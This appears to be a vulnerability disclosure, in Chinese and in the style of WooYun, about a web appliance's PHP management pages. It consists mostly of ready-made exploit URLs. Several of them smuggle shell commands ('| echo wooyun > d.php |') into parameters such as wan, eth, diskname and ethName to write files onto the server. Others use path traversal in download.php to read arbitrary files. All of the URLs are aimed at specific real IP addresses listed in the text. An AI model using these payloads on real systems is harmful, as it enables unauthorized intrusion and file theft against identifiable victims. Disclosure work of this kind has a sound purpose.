redial_pppoe.php:
第一处:
ifDownInterface
第二处
http://218.206.217.19:8080/acc/network/redial_pppoe.php?wan= | echo wooyun > d.php |
访问:http://218.206.217.19:8080/acc/network/d.php 即可
第三处:
check_interface_stat.php:
http://218.206.217.19:8080/acc/network/interface/check_interface_stat.php?eth= | echo wooyun > h.php |
访问:http://218.206.217.19:8080/acc/network/interface/h.php 即可
第四处:
fdisk_action.php:
跟进fdiskSD
url:
http://218.206.217.19:8080/acc/fdisk/fdisk_action.php?action=1&diskname=1 | echo wooyun > k.php | &setTosize=10
访问:
http://218.206.217.19:8080/acc/fdisk/k.php 即可
static_restart_arp_action.php:
跟进getNetworkConfigItemValue:
再跟进父类:
这里没有对config 和 option做过滤导致命令执行
http://218.206.217.19:8080/acc/bindipmac/static_restart_arp_action.php?ethName= | echo wooyun > l.php |
访问url:http://218.206.217.19:8080/acc/bindipmac/l.php 即可
下来看第二处
static_arp.php:
这里有2处
getIfConfigForIfname
getNetworkConfigItemValue
跟进第一个:
最终还是跑到了这个getNetworkConfigItemValue 里面
原理不多分析了
http://61.54.222.33:8080
http://61.148.24.182:8080/
http://61.54.222.39:8080/
http://61.148.24.182:8080
任意文件下载
download.php:
只要文件存在 就不走里面的copy
http://61.54.222.33:8080/acc/vpn/download.php?f=../index.php
http://61.148.24.182:8080/acc/vpn/download.php?f=../index.php
http://61.54.222.39:8080/acc/vpn/download.php?f=../index.php
http://61.148.24.182:8080/acc/vpn/download.php?f=../index.php
http://218.206.217.19:8080/acc/vpn/download.php?f=../index.php